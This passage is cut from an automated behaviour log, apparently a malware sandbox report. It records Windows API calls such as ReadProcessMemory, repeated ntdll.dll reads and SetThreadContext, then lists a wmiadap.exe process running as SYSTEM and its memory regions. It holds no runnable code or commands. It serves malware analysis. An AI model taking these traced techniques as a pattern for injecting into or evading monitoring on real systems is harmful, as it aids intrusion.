[355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0220.280] ReadProcessMemory (in: hProcess=0x58, lpBaseAddress=0x7efde008, lpBuffer=0x180e08, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x180e08*, lpNumberOfBytesRead=0x0) returned 1 [0220.280] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180994 | out: Wow64Process=0x180994) returned 1 [0220.288] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0220.289] GetFileSize (in: hFile=0x60, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0220.289] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0220.290] ReadFile (in: hFile=0x60, lpBuffer=0x9e0000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808cc, lpOverlapped=0x0 | out: lpBuffer=0x9e0000*, lpNumberOfBytesRead=0x1808cc*=0x13b740, lpOverlapped=0x0) returned 1 [0220.320] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0xb20000 [0220.341] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0220.341] GetFileSize (in: hFile=0x60, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0220.341] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0220.341] ReadFile (in: hFile=0x60, lpBuffer=0x9e0000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x180888, lpOverlapped=0x0 | out: lpBuffer=0x9e0000*, lpNumberOfBytesRead=0x180888*=0x13b740, lpOverlapped=0x0) returned 1 [0220.350] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0xb20000 [0220.366] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0220.366] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0220.366] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0220.366] ReadFile (in: hFile=0x5c, lpBuffer=0x9e0000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x18085c, lpOverlapped=0x0 | out: lpBuffer=0x9e0000*, lpNumberOfBytesRead=0x18085c*=0x13b740, lpOverlapped=0x0) returned 1 [0220.371] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0xb20000 [0220.387] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0220.387] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0220.387] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0220.387] ReadFile (in: hFile=0x5c, lpBuffer=0x9e0000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x18085c, lpOverlapped=0x0 | out: lpBuffer=0x9e0000*, lpNumberOfBytesRead=0x18085c*=0x13b740, lpOverlapped=0x0) returned 1 [0220.392] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0xb20000 [0220.408] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0220.409] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0220.409] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0220.409] ReadFile (in: hFile=0x5c, lpBuffer=0x9e0000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808a0, lpOverlapped=0x0 | out: lpBuffer=0x9e0000*, lpNumberOfBytesRead=0x1808a0*=0x13b740, lpOverlapped=0x0) returned 1 [0220.413] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0xb20000 [0220.427] SetThreadContext (hThread=0x54, lpContext=0x180b24*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x777d01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0220.427] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x1809a0 | out: Wow64Process=0x1809a0) returned 1 [0220.429] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0220.429] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0220.429] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0220.429] ReadFile (in: hFile=0x5c, lpBuffer=0x9e0000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808c4, lpOverlapped=0x0 | out: lpBuffer=0x9e0000*, lpNumberOfBytesRead=0x1808c4*=0x13b740, lpOverlapped=0x0) returned 1 [0220.434] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0xb20000 [0220.520] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0220.520] GetFileSize (in: hFile=0x60, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0220.520] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0220.520] ReadFile (in: hFile=0x60, lpBuffer=0x9e0000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808cc, lpOverlapped=0x0 | out: lpBuffer=0x9e0000*, lpNumberOfBytesRead=0x1808cc*=0x13b740, lpOverlapped=0x0) returned 1 [0220.525] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0xb20000 [0220.555] ExitProcess (uExitCode=0x0) Process: id = "34" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x48dfc000" os_pid = "0xb30" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x368" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4309 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4310 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4311 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4312 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4313 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4314 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4315 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4316 start_va = 0xffb90000 end_va = 0xffbbffff entry_point = 0xffb90000 region_type = mapped_file name = "wmiadap.exe" filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe") Region: id = 4317 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4318 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4319 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 4320 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4321 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4322 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4323 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4324 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4325 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4326 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4327 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4328 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4329 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 4330 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 4331 start_va = 0x3e0000 end_va = 0x49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 4332 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4333 start_va = 0x550000 end_va = 0x6d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 4334 start_va = 0x6e0000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 4335 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4336 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4337 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4338 start_va = 0x7fef5e10000 end_va = 0x7fef5e95fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 4339 start_va = 0x7fef8be0000 end_va = 0x7fef8c06fff entry_point = 0x7fef8be0000 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 4340 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4341 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4342 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4343 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4344 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4345 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4346 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4347 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4348 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4349 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4350 start_va = 